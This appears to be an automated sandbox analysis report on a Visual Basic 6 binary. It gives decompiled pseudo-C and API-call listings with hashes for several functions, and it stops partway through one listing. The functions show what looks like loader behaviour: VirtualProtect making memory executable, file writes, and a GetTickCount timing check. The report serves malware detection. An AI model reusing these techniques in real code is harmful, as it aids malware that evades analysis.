Instruction Fuzzy Hash: 364129B5D0021AEBCB00DFD4D989EEEBB79FB49704F10851AF502A7290D7786909CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004288F0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004288F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v48;
				long _v56;
				long _v60;
				intOrPtr _t48;
				void* _t51;
				long _t54;
				char* _t60;
				intOrPtr* _t83;
				void* _t88;
				void* _t90;
				intOrPtr _t91;

				_t91 = _t90 - 8;
				 *[fs:0x0] = _t91;
				_v12 = _t91 - 0x2c;
				_v8 = 0x440300;
				_t83 = __imp____vbaRedim;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				 *_t83(0x80, 1,  &_v24, 0x11, 1, 0x3f, 0, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t88);
				 *_t83(0x880, 0x10,  &_v40, 0, 1, 0, 0);
				_v48 = 0;
				_v56 = 3;
				__imp____vbaVarMove();
				_t48 =  *0x4411f4; // 0x0
				_v60 = L00425117( *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + (0xd -  *((intOrPtr*)(_t48 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + (0xd -  *((intOrPtr*)(_t48 + 0x14))) * 4)),  &_v40);
				__imp____vbaErase(0,  &_v40);
				_t51 = _v60;
				_v28 = _t51;
				VirtualProtect(_t51, 0x40, 0x40,  &_v32);
				__imp____vbaAryLock( &_v36, _v24);
				_t54 = _v36;
				__imp__#644( *((intOrPtr*)(_t54 + 0xc)) -  *((intOrPtr*)(_t54 + 0x14)));
				_v60 = _t54;
				__imp____vbaAryUnlock( &_v36);
				E004253EA(_v28, _v60, 0x40);
				_v60 = 0x40;
				E004288C0( &_v28,  &_v60,  &_v32,  &_v32);
				_t60 =  &_v24;
				__imp____vbaAryDestruct(0, _t60, E00428A47);
				return _t60;
			}

0x004288f3
0x00428902
0x0042890f
0x00428912
0x0042891b
0x00428933
0x00428936
0x00428939
0x0042893c
0x0042893f
0x00428942
0x00428945
0x00428948
0x0042895a
0x0042895f
0x00428962
0x0042897c
0x00428982
0x004289a4
0x004289a9
0x004289af
0x004289bb
0x004289be
0x004289cc
0x004289d2
0x004289de
0x004289e4
0x004289eb
0x004289fb
0x00428a10
0x00428a17
0x00428a3a
0x00428a40
0x00428a46

APIs

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0000003F,00000000,66106AEE,00000000,660DC30A), ref: 00428948
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0042895A
__vbaVarMove.MSVBVM60 ref: 0042897C
__vbaErase.MSVBVM60(00000000,?), ref: 004289A9
VirtualProtect.KERNEL32(?,00000040,00000040,?), ref: 004289BE
__vbaAryLock.MSVBVM60(?,?), ref: 004289CC
#644.MSVBVM60(00401006), ref: 004289DE
__vbaAryUnlock.MSVBVM60(?), ref: 004289EB

Part of subcall function 004288C0: VirtualProtect.KERNEL32(?,?,?,?,00428A1C,?,?,?,?,?,?,00000040), ref: 004288DA

__vbaAryDestruct.MSVBVM60(00000000,?,00428A47,?,?,?,?,?,?,00000040), ref: 00428A40

Strings

@, xrefs: 00428A10

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$ProtectRedimVirtual$#644DestructEraseLockMoveUnlock
String ID: @
API String ID: 3563997547-2766056989
Opcode ID: 40c8f3ce65747f934ec7efda3e9de5352a45b62524a440590ece0a0695b75f07
Instruction ID: 850745cb908fb9507a91370de5af5f0f17656a4b4df5a133b06f2483a6ae1c10
Opcode Fuzzy Hash: 40c8f3ce65747f934ec7efda3e9de5352a45b62524a440590ece0a0695b75f07
Instruction Fuzzy Hash: 0D412CB5A00219AFDB04DF94D989FEEBBB9FB48700F10411AF605B7280D7B4A905CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00427960, Relevance: 15.1, APIs: 10, Instructions: 107COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004031DC,004402E4), ref: 004279B6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004031CC,00000024), ref: 004279D7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004279F6
__vbaNew2.MSVBVM60(004031DC,004402E4), ref: 00427A0A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004031CC,0000001C), ref: 00427A3C
__vbaStrVarVal.MSVBVM60(?,?), ref: 00427A4C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402C1C,00000054), ref: 00427A66
__vbaFreeStr.MSVBVM60 ref: 00427A6F
__vbaFreeObj.MSVBVM60 ref: 00427A78
__vbaFreeVar.MSVBVM60 ref: 00427A81

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2
String ID:
API String ID: 4034668929-0
Opcode ID: 3cdbe7ffdb5bf4f6cca05733d8957d46c10e2c8a91501eda5029d12e975f65c4
Instruction ID: 06e3fa9b09ea9b1957770d420d7dbff5786d0256ba4f98b5be2cd7b064bf728a
Opcode Fuzzy Hash: 3cdbe7ffdb5bf4f6cca05733d8957d46c10e2c8a91501eda5029d12e975f65c4
Instruction Fuzzy Hash: 18415B70A00215AFDB10DF65DC88EAEBFBCFF55705B10842AF501A32A1D7789905CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004270E0, Relevance: 13.6, APIs: 9, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,00440238,660DA008,00401006,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00427125
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,00000000,00401006), ref: 00427155
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 0042717B
__vbaAryLock.MSVBVM60(?,?), ref: 0042718C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004271C1
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004271CB
__vbaAryCopy.MSVBVM60(?,?), ref: 004271D9
__vbaFreeObj.MSVBVM60(00427219,?,?,?,?,?,?,?,00000000,00401006), ref: 00427206
__vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00427212

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$AddrefCopyDestructFreeLockRedimUnlock
String ID:
API String ID: 4132618860-0
Opcode ID: 008dcb8a48255c5c95b0743255a7545369dca3a1204e67ab7ee8e84232e42062
Instruction ID: 07d9d582a26ea85090ab316d58f0fcdfc21c9935f83344874a5eed78b2a2c150
Opcode Fuzzy Hash: 008dcb8a48255c5c95b0743255a7545369dca3a1204e67ab7ee8e84232e42062
Instruction Fuzzy Hash: 06311AB4A00219AFDB04DB94DD89EEEBBB8FB48B04F108519F601B7290D7799945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00428560, Relevance: 13.6, APIs: 9, Instructions: 65COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
#653.MSVBVM60(?,?), ref: 004285BB
__vbaI4Var.MSVBVM60(?), ref: 004285C5
__vbaFreeVar.MSVBVM60 ref: 004285DB
__vbaFreeStr.MSVBVM60(00428651), ref: 0042864A

Part of subcall function 00428670: __vbaStrCopy.MSVBVM60(660E6C30,?,00000002), ref: 004286B0
Part of subcall function 00428670: #632.MSVBVM60(?,?,?,?), ref: 004286E0
Part of subcall function 00428670: __vbaStrVarMove.MSVBVM60(?), ref: 004286EA
Part of subcall function 00428670: __vbaStrMove.MSVBVM60 ref: 004286F5
Part of subcall function 00428670: __vbaFreeVar.MSVBVM60 ref: 004286FE
Part of subcall function 00428670: __vbaFreeStr.MSVBVM60(0042872E), ref: 00428727

__vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
__vbaStrCat.MSVBVM60(00000000), ref: 00428604
__vbaStrMove.MSVBVM60 ref: 0042860F
__vbaFreeStr.MSVBVM60 ref: 00428614

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Move$Copy$#632#653
String ID:
API String ID: 2241139991-0
Opcode ID: 5edd0a6f8863601442dbd3fa84a701050698e2b301384a0b31e28ac652d79df8
Instruction ID: 8161b957b8ad216969d8cfc2483efb03827d9070292c057ee585b1a8bd7f0755
Opcode Fuzzy Hash: 5edd0a6f8863601442dbd3fa84a701050698e2b301384a0b31e28ac652d79df8
Instruction Fuzzy Hash: 9E214AB5D01248AFCF00DFA4D949ADEBBB4FB09300F108029E505B3250EB796E05CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0042541A, Relevance: 12.1, APIs: 8, Instructions: 126fileCOMMON

Download Yara Rule

APIs

#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004254B3
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004254CD
__vbaAryLock.MSVBVM60(?), ref: 004254F8
WriteFile.KERNEL32(?,00401006,00000000,?,00000000), ref: 00425514
__vbaAryUnlock.MSVBVM60(?), ref: 0042551E
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 00425534
__vbaVarZero.MSVBVM60 ref: 0042555D

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$File$#644CreateLockRedimUnlockWriteZero
String ID:
API String ID: 4266029185-0
Opcode ID: 0800600135d8be1da8474faa0e487acde5a46ff4e005cda75dc6c2174fd92963
Instruction ID: 0e6215940c32a81349e6bae7e228c04f66102eb5e90755d90290a73af5262fe1
Opcode Fuzzy Hash: 0800600135d8be1da8474faa0e487acde5a46ff4e005cda75dc6c2174fd92963
Instruction Fuzzy Hash: DF41A4B4900258AFCB11DFA8ED89F9EBFB9FF0A710F10415AF605A7291C7749944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425A20, Relevance: 12.1, APIs: 8, Instructions: 116COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,660DC6D9,660DDE99,660DC6FC), ref: 00425A71
__vbaVarMove.MSVBVM60 ref: 00425A9B
__vbaVarZero.MSVBVM60 ref: 00425ACB
__vbaVarZero.MSVBVM60 ref: 00425AEA
__vbaVarZero.MSVBVM60 ref: 00425B09
__vbaVarZero.MSVBVM60 ref: 00425B28
__vbaVarZero.MSVBVM60 ref: 00425B4B
__vbaErase.MSVBVM60(00000000,?), ref: 00425B73

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Zero$EraseMoveRedim
String ID:
API String ID: 3541664652-0
Opcode ID: b9f3b7a6cdfd484fe96e6ed87921068f5ea922a8d6880ef528adc8bb9bfc96c6
Instruction ID: 4d7edb864d9024bc3dbba00981568f81df3088f366a590561897535ac5f7bedd
Opcode Fuzzy Hash: b9f3b7a6cdfd484fe96e6ed87921068f5ea922a8d6880ef528adc8bb9bfc96c6
Instruction Fuzzy Hash: F0413CB4D002199FDB18CF98D899AAEBFB4FF48310F11412EE606AB355D770A940CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00428750, Relevance: 12.1, APIs: 8, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000,66106AEE,00000000,660DC30A), ref: 004287A1
__vbaVarMove.MSVBVM60 ref: 004287D1
__vbaVarMove.MSVBVM60 ref: 004287FC
#644.MSVBVM60(?), ref: 00428802
__vbaVarMove.MSVBVM60 ref: 00428822
__vbaVarMove.MSVBVM60 ref: 0042883F
__vbaVarMove.MSVBVM60 ref: 0042885F
__vbaErase.MSVBVM60(00000000,?), ref: 00428885

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$#644EraseRedim
String ID:
API String ID: 3032237109-0
Opcode ID: 43875cfa2ff4225ed0749a51c8e92c9c75dee1c901652c35d2755d6b5c5c63f2
Instruction ID: d0850875b79e4c1ecb97c12bf59cdd7a74643b629592b024feebfc33ac90fa51
Opcode Fuzzy Hash: 43875cfa2ff4225ed0749a51c8e92c9c75dee1c901652c35d2755d6b5c5c63f2
Instruction Fuzzy Hash: 25414DB0E002499FDB18DF98D899AADFFB4FF48310F01412EE605AB291D774A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00425470, Relevance: 12.1, APIs: 8, Instructions: 102
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00425470(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				char _v36;
				char _v40;
				void** _v48;
				struct _OVERLAPPED* _v56;
				long _v60;
				WCHAR* _t37;
				void* _t38;
				intOrPtr _t42;
				long _t49;
				intOrPtr _t70;
				void* _t74;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				 *[fs:0x0] = _t77;
				_v12 = _t77 - 0x2c;
				_v8 = 0x440178;
				_t37 = _a4;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				__imp__#644( *_t37, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t74);
				_v60 = _t37;
				_t38 = CreateFileW(_t37, 0xc0000000, 3, 0, 2, 0x80, 0);
				_v28 = _t38;
				if(_t38 != 0xffffffff) {
					_t70 =  *_a8;
					_t49 = E004253DC(_t70);
					if(_t49 > 0) {
						_v60 = 0;
						__imp____vbaAryLock( &_v36, _t70);
						WriteFile(_v28,  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 0x14)), _t49,  &_v60, 0);
						__imp____vbaAryUnlock( &_v36);
					}
					__imp____vbaRedim(0x880, 0x10,  &_v40, 0, 1, 0, 0);
					_v56 = 0x4003;
					_v48 =  &_v28;
					__imp____vbaVarZero();
					_t42 =  *0x4411f4; // 0x0
					_t38 = L00425117( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  &_v40);
					__imp____vbaErase(0,  &_v40);
					_v32 = 0xffffffff;
				}
				_push(E004255B3);
				return _t38;
			}

0x00425473
0x00425482
0x0042548f
0x00425492
0x00425499
0x0042549e
0x004254a1
0x004254a6
0x004254aa
0x004254ad
0x004254b0
0x004254b3
0x004254ca
0x004254cd
0x004254d6
0x004254d9
0x004254e2
0x004254ea
0x004254ee
0x004254f5
0x004254f8
0x00425514
0x0042551e
0x0042551e
0x00425534
0x0042553d
0x00425544
0x0042555d
0x00425563
0x0042557d
0x00425587
0x0042558d
0x0042558d
0x00425594
0x00000000

APIs

#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004254B3
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004254CD
__vbaAryLock.MSVBVM60(?), ref: 004254F8
WriteFile.KERNEL32(?,00401006,00000000,?,00000000), ref: 00425514
__vbaAryUnlock.MSVBVM60(?), ref: 0042551E
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 00425534
__vbaVarZero.MSVBVM60 ref: 0042555D
__vbaErase.MSVBVM60(00000000,?), ref: 00425587

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$File$#644CreateEraseLockRedimUnlockWriteZero
String ID:
API String ID: 2317852514-0
Opcode ID: d5789eb2335ac9ed673dab367f6343a8229e9bb4828e5e99a1f7c2e1f9d3d2ee
Instruction ID: e0b0918a22699c8db653223f53bd387ccb7df34eab25281c2b97f5880a91e22a
Opcode Fuzzy Hash: d5789eb2335ac9ed673dab367f6343a8229e9bb4828e5e99a1f7c2e1f9d3d2ee
Instruction Fuzzy Hash: BA415EB4A00218AFCB14DFA8E989E9EBFB9FF4D710F104119F605A7290D7749940CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00426800, Relevance: 12.1, APIs: 8, Instructions: 52COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00402938,00402930,66106AEE,660E6C30,660DC30A,?,?,?,00000000,00401006), ref: 00426844
__vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 00426851
__vbaStrCat.MSVBVM60(00402940,00000000,?,?,?,00000000,00401006), ref: 00426859
__vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 00426860
__vbaStrCat.MSVBVM60(00402948,00000000,?,?,?,00000000,00401006), ref: 00426868
__vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 0042686F
#644.MSVBVM60(00000000,?,?,?,00000000,00401006), ref: 00426872
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,00000000,00401006), ref: 00426889

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$#644FreeList
String ID:
API String ID: 740860121-0
Opcode ID: 66c28ca0edb75ef743b6abe26169dde3e695c2f5adcdc21729a291b0681555b1
Instruction ID: 1c86aa3654a19553965d5c8624dd3a49b3293ba52e5e73c632d3810270ff70a8
Opcode Fuzzy Hash: 66c28ca0edb75ef743b6abe26169dde3e695c2f5adcdc21729a291b0681555b1
Instruction Fuzzy Hash: AB1112B5E40219AFDB01EBA4DD4AFEF7BB8FB44700F504127E501B3190EAB869158BE5

Uniqueness

Uniqueness Score: -1.00%

Function 004273B0, Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

#593.MSVBVM60(?), ref: 004273F2
__vbaNew2.MSVBVM60(004031DC,00000000), ref: 0042740E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031CC,00000024), ref: 0042742F
__vbaR8IntI4.MSVBVM60 ref: 00427441
__vbaFreeVar.MSVBVM60 ref: 0042744D
__vbaNew2.MSVBVM60(004016F0,00441268), ref: 00427466
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403114,000006FC), ref: 0042748D

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresultNew2$#593Free
String ID:
API String ID: 2147906589-0
Opcode ID: fd7da7fab847b0dfaa0cd6af01d6c7ac0aeb7bf023f4be3477ed46cdc1b7a99f
Instruction ID: 13aee478209438a9b2659d8925df5ba8c7e6df6f6480ab9ce96ca2eb876ddfd2
Opcode Fuzzy Hash: fd7da7fab847b0dfaa0cd6af01d6c7ac0aeb7bf023f4be3477ed46cdc1b7a99f
Instruction Fuzzy Hash: BC218174641325EBDB10AF65ED49B9ABFB8FF05705F504425F505B32A0C3B89960CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00428670, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(660E6C30,?,00000002), ref: 004286B0
#632.MSVBVM60(?,?,?,?), ref: 004286E0
__vbaStrVarMove.MSVBVM60(?), ref: 004286EA
__vbaStrMove.MSVBVM60 ref: 004286F5
__vbaFreeVar.MSVBVM60 ref: 004286FE
__vbaFreeStr.MSVBVM60(0042872E), ref: 00428727

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$FreeMove$#632Copy
String ID:
API String ID: 3260605699-0
Opcode ID: 7f4dbc9c5c71a2a8f26f48c98a4a76d55145bd89b2b84795a95fe6c12d58c8f5
Instruction ID: 8f2b1cbd2e65ebdba600ee58e5e5e641c934f3715e4c51b41ea978e1494a7f2f
Opcode Fuzzy Hash: 7f4dbc9c5c71a2a8f26f48c98a4a76d55145bd89b2b84795a95fe6c12d58c8f5
Instruction Fuzzy Hash: 3811DAB5D0020DAFCB04DFA5D849ADEBBB4FB48704F10842AE615A2250EB745519CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00426A90, Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00426A90(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				signed int _v60;
				long _t24;
				intOrPtr _t28;
				void* _t32;
				void* _t53;
				void* _t55;
				intOrPtr _t56;

				_t56 = _t55 - 8;
				 *[fs:0x0] = _t56;
				_v12 = _t56 - 0x28;
				_v8 = 0x440208;
				_v36 = 0;
				_v52 = 0;
				_t24 = GetTickCount();
				__imp____vbaRedim(0x880, 0x10,  &_v36, 0, 1, 0, 0, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t53);
				_v44 = 0x1f4;
				_v52 = 3;
				_v60 =  *(_v36 + 0x14) << 4;
				__imp____vbaVarMove();
				_t28 =  *0x4411f4; // 0x0
				L00425117( *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)) + (9 -  *((intOrPtr*)(_t28 + 0x14))) * 4)),  &_v36);
				__imp____vbaErase(0,  &_v36);
				_t32 = GetTickCount() - _t24;
				_push(E00426B60);
				_v32 = (0 | _t32 - 0x000001f4 >= 0x00000000) - 1;
				return _t32;
			}

0x00426a93
0x00426aa2
0x00426aaf
0x00426ab2
0x00426ac1
0x00426ac4
0x00426ac7
0x00426adb
0x00426ae4
0x00426aeb
0x00426afe
0x00426b09
0x00426b0f
0x00426b29
0x00426b33
0x00426b3b
0x00426b44
0x00426b4d
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00426AC7
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00426ADB
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00426B09
__vbaErase.MSVBVM60(00000000,?), ref: 00426B33
GetTickCount.KERNEL32 ref: 00426B39

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CountTick$EraseMoveRedim
String ID:
API String ID: 3563492539-0
Opcode ID: 64a4fce16b3e3dbb2444bd9ab34c59056413026208fc213f2ea3f5eeaa383e68
Instruction ID: 3338a6d34392547feafc7dd2335251eccb555ad8d69498afec5356a936b7f4d9
Opcode Fuzzy Hash: 64a4fce16b3e3dbb2444bd9ab34c59056413026208fc213f2ea3f5eeaa383e68
Instruction Fuzzy Hash: 4E21BBB4A00218AFDB04DFA8ED89FADBBB8FB08704F40412DF505A7281D7789804CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00427880, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004030C8,004416EC), ref: 004278DB
__vbaObjSetAddref.MSVBVM60(?,004402A0), ref: 004278F1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403204,00000010), ref: 0042790E
__vbaFreeObj.MSVBVM60 ref: 00427917

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$AddrefCheckFreeHresultNew2
String ID:
API String ID: 1649212984-0
Opcode ID: bb4dc9ae497b3b4d845f1d40bc8647e37fdd9bb998d137c8b043301fb923498c
Instruction ID: 123c0edcd78814e6df261e2e0230156b467a4aca098805d2b43b447d024d33be
Opcode Fuzzy Hash: bb4dc9ae497b3b4d845f1d40bc8647e37fdd9bb998d137c8b043301fb923498c
Instruction Fuzzy Hash: 231186B9900304EFDB009F95DC89A9EBFB8FB49705F60812AF501A32A1C7785945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004277B0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004030C8,004416EC,?,?,?,?,?,?,?,?,00401006), ref: 00427808
__vbaObjSetAddref.MSVBVM60(?,00440290,?,?,?,?,?,?,?,?,00401006), ref: 0042781E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403204,00000010,?,?,?,?,?,?,?,?,00401006), ref: 0042783B
